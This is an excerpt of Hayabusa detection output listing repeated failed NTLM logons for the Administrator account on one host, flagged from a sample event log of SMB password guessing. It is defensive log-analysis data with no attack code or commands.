01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gv7nWzZ1HN9mgTya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dnPUb3w2d7Ltif2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCWXdvBeDPpeKhWJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GN3OXSzQqLDF348i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAWiBhYPNQ0RUuOX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5CBG3hblqr8kvWw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MDBaKpfYttm4H1gj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PNszt6piEznMlTdF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iqmBPOQIG6M1rZjX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJs7tuZpsPMYJHOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LUT5oe2DwS5vW84K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3OTe0uiDHhf5GzRL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71TuxFRZFyZEQp1S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRvTmizOLj3UUpD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LnQEZPWaN2OkpTLa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnHR9DAtgzu561sx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfBl3dbluZ7GiFum : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Hlgn7gsZwRvlXAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eyHVPtGpnmmRjJuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0l3QC0rLt9yGaIe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XfEng3JgXLmgI8GN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ORIegzlkHy8AX6RW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AzS4xRnHKxSwz5sZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0hA1XvRIlqwKG6g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mKXKkvlHvjRh33Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JIMTGRC5IQlkrG9c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NYcLsxwbg8LkGCuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kmttijRBtXqEbU0W : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXC3hYI1Gin59gvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQiozAIr9Jgklmks : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O598IvZRpbdU1liO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xlmYWrAnn3sUNSRk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aAAkO0uOGIq8zVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 26K4BIpgUbBNWbDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moW3Ts7edqoQ9XeU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8C4d3xE0QkWywbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1EgYFhtgrcjtcXM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7avpgQeA0KCIme9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFgmt3OEw4cDfPhG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OqITdE5K63nJg9tg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBs4fYCiprxgDd43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBD0Q2szeURxMYA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KPUi2NhPP92Rs3hy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PrbMf9E0fOuwIB8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 807zsxQ9WETO9YIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGMJKRYUlmijJV40 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv33to031A0fQzX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IT0bzycur7HXFeLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyY2K7tT0HgQ1ZL3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6aexuFPH6FyEZ1bN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o8Iojas6sznqlYUE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U2SnliYkmx59ACSM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2plWY1GZHilHv5Vh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIfmqihMJdPVz80p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Odg692Eyde8md0t7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gsQNvf5HkRQnbDul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: il2DGq3bzfwGuJN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9OsQFOcIyougrx0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gR8wpQrGYzd4NrBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFjRsjWXbEPs9m1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wbjudOy3rWefzAIv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Q4gc8keCTv2HeE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SmsaxHrHYuofUhAH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvhWasTJYmChfsNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DszGfEo9aua2y5UC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lZPScjxczbrcJuvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucpjxJV4rBXOxy4e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BmTtDfX05VsKFrON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhWSUkQhv089RSfJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8RXCiXQYgjuPO78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfB3u3Np38FOw6hc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9GcSmto4jdCIw6H : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HsogJdHUcldt7JeH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IUbkohKtCy6joOBY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9ZFyYxBrKnz652Co : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.001 